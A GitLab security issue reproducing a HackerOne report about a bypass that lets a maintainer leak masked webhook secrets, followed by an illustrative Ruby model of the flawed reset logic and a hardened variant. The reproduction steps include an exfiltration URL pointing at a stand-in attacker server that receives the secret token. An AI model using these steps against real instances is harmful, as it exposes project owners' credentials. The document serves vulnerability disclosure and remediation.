Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

  # ...
  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }

  # ...
  def reset_url_variables
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?
  end

However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.

Steps to reproduce

As a project owner

  1. Create a project
  2. Add another user to the project as a maintainer
  3. Go to Settings > Webhooks
  4. Put the URL https://example.com?token=secret-token
  5. Click to add a mask
  6. Add the value secret-token with the replacement TOKEN
  7. Click save for the webhook

As a maintainer

  1. Open the project
  2. Go to Settings > Webhooks
  3. Click edit on the webhook
  4. Edit the URL to your controlled server like that: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
  5. Add the value aaaaa with the replacement A
  6. Save the webhook
  7. Now click Test to send a request
  8. Check your server logs; it will contain the secret in plain text

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screen_Recording_2023-02-12_at_12.55.50.mov

How To Reproduce

Please add reproducibility information to this section:
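The following is an added plain-Ruby model of the reset logic discussed in the report; it is not GitLab's code and not the fix that was eventually merged. It reproduces the reported condition (variables are wiped only when the URL changes and the variable set is untouched) next to a hardened rule, assumed here for illustration, under which a URL change keeps only variables whose values the editor actually re-supplied. Class and method names (WebhookChange, vulnerable_effective_vars, hardened_effective_vars, render) and the sample URLs and values are constructed for the example.

```ruby
# Added example, not GitLab's code: models the webhook URL-variable reset.
# Variable hashes look like { "TOKEN" => "secret-token" } and are substituted
# into {TOKEN} placeholders in the URL when the hook fires.
class WebhookChange
  attr_reader :old_url, :new_url, :old_vars, :new_vars

  def initialize(old_url:, new_url:, old_vars:, new_vars:)
    @old_url = old_url
    @new_url = new_url
    @old_vars = old_vars
    @new_vars = new_vars
  end

  def url_changed?
    old_url != new_url
  end

  def url_variables_changed?
    old_vars != new_vars
  end

  # Mirrors the condition quoted in the report: stored variables are cleared
  # only when the URL changed AND the variable set did not. Submitting any
  # extra variable alongside the new URL keeps the previously saved secrets.
  def vulnerable_effective_vars
    url_changed? && !url_variables_changed? ? {} : new_vars
  end

  # Hardened rule (an assumption for this example, not GitLab's fix): once the
  # URL changes, a variable survives only if its value was supplied again in
  # this edit. Values carried over unchanged from storage are dropped, so a
  # new URL can never be combined with a secret its editor does not know.
  def hardened_effective_vars
    return new_vars unless url_changed?
    new_vars.reject { |name, value| old_vars[name] == value }
  end

  # Substitutes {NAME} placeholders; unknown names are left as-is so the
  # outgoing request carries the literal placeholder rather than a secret.
  def self.render(url, vars)
    url.gsub(/\{([A-Z0-9_]+)\}/) { |placeholder| vars.fetch($1, placeholder) }
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed scenario: the owner saved TOKEN, then a maintainer changes the
  # URL and adds an unrelated variable A in the same edit.
  change = WebhookChange.new(
    old_url: "https://example.com?token={TOKEN}",
    new_url: "https://other.example?token={TOKEN}&a={A}",
    old_vars: { "TOKEN" => "secret-token" },
    new_vars: { "TOKEN" => "secret-token", "A" => "aaaaa" }
  )
  puts "vulnerable: " + WebhookChange.render(change.new_url, change.vulnerable_effective_vars)
  puts "hardened:   " + WebhookChange.render(change.new_url, change.hardened_effective_vars)
end
```

Running the script shows the vulnerable rendering carrying `secret-token` to the new host, while the hardened rendering keeps the `{TOKEN}` placeholder unresolved. The trade-off of the hardened rule is that an owner who changes the URL must re-enter every masked value, which matches the expected behaviour stated in the report.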